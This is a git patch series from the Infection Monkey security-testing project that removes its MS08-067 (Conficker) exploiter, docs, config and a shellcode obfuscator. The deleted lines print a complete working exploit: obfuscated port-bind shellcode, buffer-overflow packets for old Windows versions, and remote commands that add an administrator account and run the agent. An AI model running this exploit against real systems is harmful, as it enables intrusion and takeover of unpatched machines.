From 3fc8621e163f5e13465e677d668debf8c76bfa11 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 27 Jan 2022 16:42:06 +0100 Subject: [PATCH 1/4] Docs: Remove MS08_067 exploiter documentation --- README.md | 1 - docs/content/reference/exploiters/MS08-067.md | 14 -------------- 2 files changed, 15 deletions(-) delete mode 100644 docs/content/reference/exploiters/MS08-067.md diff --git a/README.md b/README.md index 1e9477ea9..6100219df 100644 --- a/README.md +++ b/README.md @@ -47,7 +47,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SMB * WMI * Shellshock - * Conficker * Elastic Search (CVE-2015-1427) * Weblogic server * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters. diff --git a/docs/content/reference/exploiters/MS08-067.md b/docs/content/reference/exploiters/MS08-067.md deleted file mode 100644 index d4eb3b807..000000000 --- a/docs/content/reference/exploiters/MS08-067.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: "MS08 067" -date: 2020-07-14T08:42:54+03:00 -draft: false -tags: ["exploit", "windows"] ---- - -### Description - -[MS08-067](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) is a remote code execution vulnerability. - -This exploiter is unsafe. It's therefore **not** enabled by default. - -If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If a crash in Svchost.exe occurs, the server service will be affected. This may cause a system crash due to the use of buffer overflow. From ff87252a247ea3845f409865d7d3280485353845 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 27 Jan 2022 16:45:55 +0100 Subject: [PATCH 2/4] Agent, Island: Remove MS08_67 exploiter --- monkey/infection_monkey/config.py | 3 - monkey/infection_monkey/example.conf | 2 - .../infection_monkey/exploit/win_ms08_067.py | 320 ------------------ .../definitions/exploiter_classes.py | 11 - .../cc/services/config_schema/internal.py | 18 - .../exploiter_descriptor_enum.py | 1 - .../report-components/SecurityReport.js | 6 - .../security/issues/MS08_067Issue.js | 24 -- .../monkey_configs/flat_config.json | 4 +- .../monkey_config_standard.json | 4 - vulture_allowlist.py | 2 - 11 files changed, 1 insertion(+), 394 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/win_ms08_067.py delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 81c6a9996..fca494e36 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -146,9 +146,6 @@ class Configuration(object): skip_exploit_if_file_exist = False - ms08_067_exploit_attempts = 5 - user_to_add = "Monkey_IUSER_SUPPORT" - ########################### # ransomware config ########################### diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index 6c2bc3235..2133be9e3 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -43,8 +43,6 @@ ], "monkey_log_path_windows": "%temp%\\~df1563.tmp", "monkey_log_path_linux": "/tmp/user-1563", - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT", "ping_scan_timeout": 10000, "smb_download_timeout": 300, "smb_service_name": "InfectionMonkey", diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py deleted file mode 100644 index db6df1212..000000000 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ /dev/null @@ -1,320 +0,0 @@ -#!/usr/bin/env python -############################################################################# -# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) -# www.hackingspirits.com -# www.coffeeandsecurity.com -# Email: d3basis.m0hanty @ gmail.com -############################################################################# - -import socket -import time -from enum import IntEnum -from logging import getLogger - -from impacket import uuid -from impacket.dcerpc.v5 import transport - -from common.utils.shellcode_obfuscator import clarify -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.smb_tools import SmbTools -from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS -from infection_monkey.network.smbfinger import SMBFinger -from infection_monkey.network.tools import check_tcp_port -from infection_monkey.utils.commands import build_monkey_commandline -from infection_monkey.utils.random_password_generator import get_random_password - -logger = getLogger(__name__) - -# Portbind shellcode from metasploit; Binds port to TCP port 4444 -OBFUSCATED_SHELLCODE = ( - b"4\xf6kPF\xc5\x9bI,\xab\x1d" - b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J" - b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13" - b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq" - b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8" - b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J" - b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-' -) - -SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode() - -XP_PACKET = ( - "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" - "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" - "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" - "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" - "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" - "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" - "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" - "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" - "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" - "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" - "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00" -) - -# Payload for Windows 2000 target -PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" -PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" -PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" -PAYLOAD_2000 += "\x41\x41" -PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43" -PAYLOAD_2000 += "\xeb\xcc" -PAYLOAD_2000 += "\x00\x00" - -# Payload for Windows 2003[SP2] target -PAYLOAD_2003 = "\x41\x00\x5c\x00" -PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00" -PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77" -PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00" -PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae" -PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00" -PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43" -PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff" -PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75" -PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5" -PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6" -PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00" - - -class WindowsVersion(IntEnum): - Windows2000 = 1 - Windows2003_SP2 = 2 - WindowsXP = 3 - - -class SRVSVC_Exploit(object): - TELNET_PORT = 4444 - - def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): - self._port = port - self._target = target_addr - self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003 - self.os_version = os_version - - def get_telnet_port(self): - """get_telnet_port() - - The port on which the Telnet service will listen. - """ - - return SRVSVC_Exploit.TELNET_PORT - - def start(self): - """start() -> socket - - Exploit the target machine and return a socket connected to it's - listening Telnet service. - """ - - target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target - - logger.debug("Initiating exploit connection (%s)", target_rpc_name) - self._trans = transport.DCERPCTransportFactory(target_rpc_name) - self._trans.connect() - - logger.debug("Connected to %s", target_rpc_name) - - self._dce = self._trans.DCERPC_class(self._trans) - self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0"))) - - dce_packet = self._build_dce_packet() - self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation - - logger.debug("Exploit sent to %s successfully...", self._target) - logger.debug("Target machine should be listening over port %d now", self.get_telnet_port()) - - sock = socket.socket() - sock.connect((self._target, self.get_telnet_port())) - return sock - - def _build_dce_packet(self): - if self.os_version == WindowsVersion.WindowsXP: - return XP_PACKET - # Constructing Malicious Packet - dce_packet = "\x01\x00\x00\x00" - dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" - dce_packet += SHELLCODE - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" - dce_packet += "\x00\x00\x00\x00" - dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00" - dce_packet += self._payload - dce_packet += "\x00\x00\x00\x00" - dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00" - dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00" - dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00" - dce_packet += "\x01\x00\x00\x00" - - return dce_packet - - -class Ms08_067_Exploiter(HostExploiter): - _TARGET_OS_TYPE = ["windows"] - _EXPLOITED_SERVICE = "Microsoft Server Service" - _windows_versions = { - "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, - "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, - "Windows 5.1": WindowsVersion.WindowsXP, - } - - def __init__(self, host): - super(Ms08_067_Exploiter, self).__init__(host) - - def is_os_supported(self): - if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list( - self._windows_versions.keys() - ): - return True - - if not self.host.os.get("type") or ( - self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version") - ): - is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) - if is_smb_open: - smb_finger = SMBFinger() - if smb_finger.get_host_fingerprint(self.host): - return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get( - "version" - ) in list(self._windows_versions.keys()) - return False - - def _exploit_host(self): - src_path = get_target_monkey(self.host) - - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - os_version = self._windows_versions.get( - self.host.os.get("version"), WindowsVersion.Windows2003_SP2 - ) - - exploited = False - random_password = get_random_password() - for _ in range(self._config.ms08_067_exploit_attempts): - exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version) - - try: - sock = exploit.start() - - sock.send( - "cmd /c (net user {} {} /add) &&" - " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - random_password, - self._config.user_to_add, - ).encode() - ) - time.sleep(2) - sock.recv(1000) - - logger.debug("Exploited into %r using MS08-067", self.host) - exploited = True - break - except Exception as exc: - logger.debug("Error exploiting victim %r: (%s)", self.host, exc) - continue - - if not exploited: - logger.debug("Exploiter MS08-067 is giving up...") - return False - - # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file( - self.host, - src_path, - self._config.dropper_target_path_win_32, - self._config.user_to_add, - random_password, - ) - - if not remote_full_path: - # try other passwords for administrator - for password in self._config.exploit_password_list: - remote_full_path = SmbTools.copy_file( - self.host, - src_path, - self._config.dropper_target_path_win_32, - "Administrator", - password, - ) - if remote_full_path: - break - - if not remote_full_path: - return True - - # execute the remote dropper in case the path isn't final - if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % { - "dropper_path": remote_full_path - } + build_monkey_commandline( - self.host, - get_monkey_depth() - 1, - self._config.dropper_target_path_win_32, - ) - else: - cmdline = MONKEY_CMDLINE_WINDOWS % { - "monkey_path": remote_full_path - } + build_monkey_commandline(self.host, get_monkey_depth() - 1) - - try: - sock.send(("start %s\r\n" % (cmdline,)).encode()) - sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode()) - except Exception as exc: - logger.debug( - "Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc - ) - return True - finally: - try: - sock.close() - except socket.error: - pass - - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, - self.host, - cmdline, - ) - - return True diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index 56f81256b..f21bc942d 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py @@ -42,17 +42,6 @@ EXPLOITER_CLASSES = { "link": "https://www.guardicore.com/infectionmonkey/docs/reference" "/exploiters/mssql/", }, - { - "type": "string", - "enum": ["Ms08_067_Exploiter"], - "title": "MS08-067 Exploiter", - "safe": False, - "info": "Unsafe exploiter, that might cause system crash due to the use of buffer " - "overflow. " - "Uses MS08-067 vulnerability.", - "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08" - "-067/", - }, { "type": "string", "enum": ["SSHExploiter"], diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py index ff5ad4e72..94a1f3603 100644 --- a/monkey/monkey_island/cc/services/config_schema/internal.py +++ b/monkey/monkey_island/cc/services/config_schema/internal.py @@ -266,24 +266,6 @@ INTERNAL = { } }, }, - "ms08_067": { - "title": "MS08_067", - "type": "object", - "properties": { - "ms08_067_exploit_attempts": { - "title": "MS08_067 exploit attempts", - "type": "integer", - "default": 5, - "description": "Number of attempts to exploit using MS08_067", - }, - "user_to_add": { - "title": "Remote user", - "type": "string", - "default": "Monkey_IUSER_SUPPORT", - "description": "Username to add on successful exploit", - }, - }, - }, }, "smb_service": { "title": "SMB service", diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 7d7921b8b..1555b4b61 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum): ELASTIC = ExploiterDescriptor( "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor ) - MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor) SHELLSHOCK = ExploiterDescriptor( "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor ) diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index 63d1d7e6f..270db721a 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js @@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue'; import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue'; import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue'; -import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue'; import { crossSegmentIssueOverview, crossSegmentIssueReport, @@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent { [this.issueContentTypes.REPORT]: powershellIssueReport, [this.issueContentTypes.TYPE]: this.issueTypes.DANGER }, - 'Ms08_067_Exploiter': { - [this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview, - [this.issueContentTypes.REPORT]: ms08_067IssueReport, - [this.issueContentTypes.TYPE]: this.issueTypes.DANGER - }, 'ZerologonExploiter': { [this.issueContentTypes.OVERVIEW]: zerologonIssueOverview, [this.issueContentTypes.REPORT]: zerologonIssueReport, diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js deleted file mode 100644 index 2a831a093..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js +++ /dev/null @@ -1,24 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function ms08_067IssueOverview() { - return (
  • Machines are vulnerable to ‘Conficker’ (MS08-067).
  • ) -} - -export function ms08_067IssueReport(issue) { - return ( - <> - Install the latest Windows updates or upgrade to a newer operating system. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a Conficker attack. -
    - The attack was made possible because the target machine used an outdated and unpatched operating system - vulnerable to Conficker. -
    - - ); -} diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index 2840cbbb5..4f6704d9b 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -76,7 +76,6 @@ "max_depth": null, "monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_windows": "%temp%\\~df1563.tmp", - "ms08_067_exploit_attempts": 5, "ping_scan_timeout": 1000, "post_breach_actions": [ "CommunicateAsBackdoorUser", @@ -120,6 +119,5 @@ 3306, 7001, 8088 - ], - "user_to_add": "Monkey_IUSER_SUPPORT" + ] } diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index fc9f2bb05..b810d4356 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -121,10 +121,6 @@ "exploit_ssh_keys": [], "general": { "skip_exploit_if_file_exist": false - }, - "ms08_067": { - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT" } }, "testing": { diff --git a/vulture_allowlist.py b/vulture_allowlist.py index 926863a6d..2f7598379 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30) SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31) ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32) -MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35) SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36) STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39) WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) @@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466) structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467) structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478) -_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123) oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96) export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282) NoInternetError # unused class (monkey/common/utils/exceptions.py:33) From ceec121d880539a0e4ed9baa954636f718fda621 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 27 Jan 2022 16:46:30 +0100 Subject: [PATCH 3/4] Agent: Remove shellcode obfusctor Encryptor which was used in MS08-067 exploiter. --- monkey/common/utils/shellcode_obfuscator.py | 30 ------------------- monkey/infection_monkey/Pipfile | 1 - .../common/utils/test_shellcode_obfuscator.py | 14 --------- .../master/test_propagator.py | 7 ++--- 4 files changed, 2 insertions(+), 50 deletions(-) delete mode 100644 monkey/common/utils/shellcode_obfuscator.py delete mode 100644 monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py diff --git a/monkey/common/utils/shellcode_obfuscator.py b/monkey/common/utils/shellcode_obfuscator.py deleted file mode 100644 index 11635201e..000000000 --- a/monkey/common/utils/shellcode_obfuscator.py +++ /dev/null @@ -1,30 +0,0 @@ -# This code is used to obfuscate shellcode -# Usage: -# shellcode_obfuscator.py [your normal shellcode]. - -import sys - -# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports -from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413 - -# We only encrypt payloads to hide them from static analysis -# it's OK to have these keys plaintext -KEY = b"1234567890123456" -NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f" - - -# Use this manually to get obfuscated bytes of shellcode -def obfuscate(shellcode: bytes) -> bytes: - cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE) - ciphertext, _ = cipher.encrypt_and_digest(shellcode) - return ciphertext - - -def clarify(shellcode: bytes) -> bytes: - cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE) - plaintext = cipher.decrypt(shellcode) - return plaintext - - -if __name__ == "__main__": - print(obfuscate(sys.argv[1].encode())) diff --git a/monkey/infection_monkey/Pipfile b/monkey/infection_monkey/Pipfile index 728e42a4f..60def5d44 100644 --- a/monkey/infection_monkey/Pipfile +++ b/monkey/infection_monkey/Pipfile @@ -23,7 +23,6 @@ ScoutSuite = {git = "git://github.com/guardicode/ScoutSuite"} pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl pypsrp = "*" typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project -pycryptodome = "*" # Used in common/utils/shellcode_obfuscator.py altgraph = "*" # Required for pyinstaller branch, without it agents fail to build pysmb = "*" "WinSys-3.x" = "*" diff --git a/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py b/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py deleted file mode 100644 index bda9f7996..000000000 --- a/monkey/tests/unit_tests/common/utils/test_shellcode_obfuscator.py +++ /dev/null @@ -1,14 +0,0 @@ -from unittest import TestCase - -from common.utils.shellcode_obfuscator import clarify, obfuscate - -SHELLCODE = b"1234567890abcd" -OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^=" - - -class TestShellcodeObfuscator(TestCase): - def test_obfuscate(self): - assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE - - def test_clarify(self): - assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE diff --git a/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py b/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py index 745e075fa..0e54f2a4e 100644 --- a/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py +++ b/monkey/tests/unit_tests/infection_monkey/master/test_propagator.py @@ -11,12 +11,9 @@ from infection_monkey.i_puppet import ( PortStatus, ) from infection_monkey.master import IPScanResults, Propagator -from infection_monkey.network import NetworkInterface -from infection_monkey.telemetry.exploit_telem import ExploitTelem from infection_monkey.model import VictimHost, VictimHostFactory -from infection_monkey.network import NetworkAddress - - +from infection_monkey.network import NetworkAddress, NetworkInterface +from infection_monkey.telemetry.exploit_telem import ExploitTelem @pytest.fixture From d257276f30188ff704dafb7aa9ed676d94bba050 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Mon, 31 Jan 2022 08:15:43 -0500 Subject: [PATCH 4/4] Changelog: Add entry for removal of MS08-067 exploiter --- CHANGELOG.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index df5828bc6..054e7b749 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -19,7 +19,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). clearer instructions to the user and avoid confusion. #1684 ### Removed -- The VSFTPD exploiter. #1533 +- VSFTPD exploiter. #1533 - Manual agent run command for CMD. #1570 - Sambacry exploiter. #1567 - "Kill file" option in the config. #1536 @@ -40,6 +40,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). - "GET /api/monkey_control/check_remote_port/" endpoint. #1635 - Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597 - MySQL fingerprinter. #1648 +- MS08-067 (Conficker) exploiter. #1677 ### Fixed - A bug in network map page that caused delay of telemetry log loading. #1545